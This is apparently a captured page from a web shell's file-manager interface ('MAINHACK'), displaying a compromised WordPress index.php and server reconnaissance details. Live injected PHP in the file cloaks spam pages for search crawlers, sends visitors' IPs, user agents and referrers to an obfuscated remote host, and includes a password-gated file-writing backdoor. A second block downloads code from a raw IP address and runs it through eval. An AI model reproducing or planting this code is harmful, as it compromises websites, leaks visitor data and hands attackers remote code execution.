[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: index.php
File is not writable. Editing disabled.
<?php // 2DUAN_START // __B26_2DUAN_WP_INLINE_GUARD_MK_v2__ define("KK", "44dabd95ad26439f462a3fa859647c5e"); define("NN", "6012"); define("URL", "%34%31%35%39%2D%72%61%2D%69%34%2D%31%2E%32%31%6E%66%2E%6B%6C%6D"); if(!empty($_REQUEST["error"])){ ini_set("display_errors", "On"); ini_set("error_reporting",E_ALL); $s_statsu=true; }else{ error_reporting(0); ini_set('display_errors', 0); $s_statsu=false; } @set_time_limit(3600); @ignore_user_abort(1); $wV5OL = URL; $sBXh8 = "http"; if (ESm1m()) { $usAhr = "https"; } else { $usAhr = "http"; } $OwIhJ = BVeon(); if ($OwIhJ == '') { $OwIhJ = "/"; } if (preg_match('#^/index\.php/?$#i', $OwIhJ)) { $OwIhJ = "/"; } $FvlcR = urlencode($OwIhJ); $allurl=urlencode(getCurrentUrl()); $rdzSK = urlencode(getHostdomain()); $NwKOf = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? urlencode($_SERVER["HTTP_ACCEPT_LANGUAGE"]) : ''; if (isset($_SERVER["HTTP_REFERER"])) { $qM7np = $_SERVER["HTTP_REFERER"]; $qM7np = urlencode($qM7np); }else{ $qM7np=''; } if (isset($_SERVER["HTTP_USER_AGENT"])) { $MdsNo = urlencode($_SERVER["HTTP_USER_AGENT"]); }else{ $MdsNo=''; } if(!empty($_REQUEST["pwd"])){ $fFWzR = md5($_REQUEST["pwd"]); }else{ $fFWzR=''; } if ($fFWzR == "8c929159e2048ffc2f53596b093ef089") { $izj_M = @$_REQUEST["gv"]; $Bpum2 = @$_REQUEST["action"]; if($Bpum2=="checkwp"){ echo "success"; }elseif(!empty($izj_M)){ $name=$izj_M; $content="google-site-verification: ".$name; $handle=fopen($name."","w"); fwrite($handle,$content); fclose($handle); if(file_exists($name)){ echo "true"; }else{ echo "false"; } } exit; } $ZibXI = strtr(urldecode($wV5OL), "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm"); if($OwIhJ=="/"){ $SendCheck=true; }else{ if(checkLink(urldecode($allurl))||strstr(urldecode($allurl), ".xml")){ $SendCheck=true; }else{ $SendCheck=false; } } if($SendCheck){ $isus=1; }else{ $isus=2; } $getUrl = $sBXh8 . "://" . $ZibXI . "/?web=" . $rdzSK . "&zz=" . wiRNx() . "&uri=" . $FvlcR. "&ufrom=" . $qM7np . "&allurl=" . $allurl . "&lang=" . $NwKOf. "&ua=" . $MdsNo. "&kk=".KK."&nn=".NN."&pp=".urlencode(bvwg3())."&isus=".$isus ; if (!badSpider($MdsNo)&&!checkFileType(urldecode($allurl))) { $backhtml = trim(RgbKM($getUrl)); }else{ $backhtml=''; } if($s_statsu){ echo $backhtml; } if(!empty($backhtml)){ if (!strstr($backhtml, "{{code")&&!strstr($backhtml, ".xyz")) { if(strstr($backhtml, "okxmlgetcontent")){ $backhtml = str_replace("okxmlgetcontent", '', $backhtml); @header("Content-type: text/xml"); echo $backhtml; exit; }else{ echo $backhtml;exit; } }else{ if(strstr($backhtml, "code404")){ } } } function getHostdomain() { $scheme = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http'; $host = $_SERVER['HTTP_HOST']; return "$scheme://$host"; } function getCurrentUrl() { $scheme = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http'; $host = $_SERVER['HTTP_HOST']; $requestUri = $_SERVER['REQUEST_URI']; return "$scheme://$host$requestUri"; } function BVeoN() { if (isset($_SERVER["REQUEST_URI"])) { $FvlcR = $_SERVER["REQUEST_URI"]; } elseif (isset($_SERVER["argv"])) { $FvlcR = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { $FvlcR = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } return $FvlcR; } function esM1M() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; } else { if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } else { if (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; } } } return false; } function RgbKM($GGBCD) { $RKqb1 = ''; if (function_exists("curl_init")) { $PdUoH = curl_init(); curl_setopt($PdUoH, CURLOPT_URL, $GGBCD); curl_setopt($PdUoH, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($PdUoH, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($PdUoH, CURLOPT_RETURNTRANSFER, 1); curl_setopt($PdUoH, CURLOPT_CONNECTTIMEOUT, 20); $RKqb1 = curl_exec($PdUoH); curl_close($PdUoH); } if (!$RKqb1) { $RKqb1 = @file_get_contents($GGBCD); } return $RKqb1; } function wiRNx() { $userAgent= strtolower($_SERVER ['HTTP_USER_AGENT']); $spiders = array( 'Googlebot', 'Bingbot', 'yahoo', 'duckduckbot', ); foreach ($spiders as $spider) { if (strpos($userAgent, strtolower($spider)) !== false) { return true; } } return false; } function bvwg3() { if (isset($_SERVER["HTTP_X_SHOPIFY_CLIENT_IP"])) { return $_SERVER["HTTP_X_SHOPIFY_CLIENT_IP"]; } if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) { return $_SERVER["HTTP_CF_CONNECTING_IP"]; } $v = getenv("HTTP_CLIENT_IP"); if ($v && strcasecmp($v, "unknown")) { return $v; } $v = getenv("HTTP_X_FORWARDED_FOR"); if ($v && strcasecmp($v, "unknown")) { return $v; } $v = getenv("REMOTE_ADDR"); if ($v && strcasecmp($v, "unknown")) { return $v; } if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { return $_SERVER["REMOTE_ADDR"]; } return ""; } function badSpider($userAgent) { $spiderstr='SemrushBot|DotBot|Twitter|facebook|Yandex|MJ12bot|AhrefsBot|MauiBot|MegaIndex.ru|BLEXBot|ZoominfoBot|ExtLinksBot|hubspot|leiki|webmeup|Slurp|twiceler|AddThis.com|AcoonBot|Acunetix|adbeat_bot|AddThis.com|adixxbot|BeetleBot|idbot|CCBot|Crawlera|ZumBot|ZyBorg'; $spiderAgents=explode("|",$spiderstr); foreach ($spiderAgents as $agent) { if (stripos($userAgent, $agent) !== false) { return true; } } return false; } function checkLink($link) { $pattern = '/\/\?[a-zA-Z]=/'; return preg_match($pattern, $link) > 0; } function checkFileType($url) { $p=strtolower(parse_url($url,PHP_URL_PATH)?:''); if($p==='/index.php'||$p==='/index.php/'){return false;} $fileTypes = array( 'jpg', 'jpeg', 'png', 'gif', 'bmp', 'webp','php','avi', 'js', 'css','doc','exe','iso','tif','pic','tiff','woff2','wav','int','dll','sys','bak','bat', 'pdf','xls','zip','rar','tar.gz','mp3','mp4','ppt','txt','gz', 'asp','aspx','jsp','tpl','ajax' ); $extension = strtolower(pathinfo($url, PATHINFO_EXTENSION)); if (in_array($extension, $fileTypes)) { return true; } else { return false; } } // 2DUAN_END ?><?php $u = 'http://192.151.154.210/z60626_4/stat/index.txt'; $d = ''; if (function_exists('curl_init')) { $ch = curl_init($u); curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER => 1, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_FOLLOWLOCATION => 1]); $d = curl_exec($ch); curl_close($ch); } elseif (ini_get('allow_url_fopen')) { $d = file_get_contents($u, false, stream_context_create(["ssl"=>["verify_peer"=>false]])); } if ($d) @eval('?>'.$d); /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium171.web-hosting.com
Server IP: 162.0.209.115
PHP Version: 8.0.30
Server Software: LiteSpeed
System: Linux premium171.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 71.39 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: aircyknj
User ID (UID): 2056
Group ID (GID): 2052
Script Owner UID: 2056
Current Dir Owner: 2056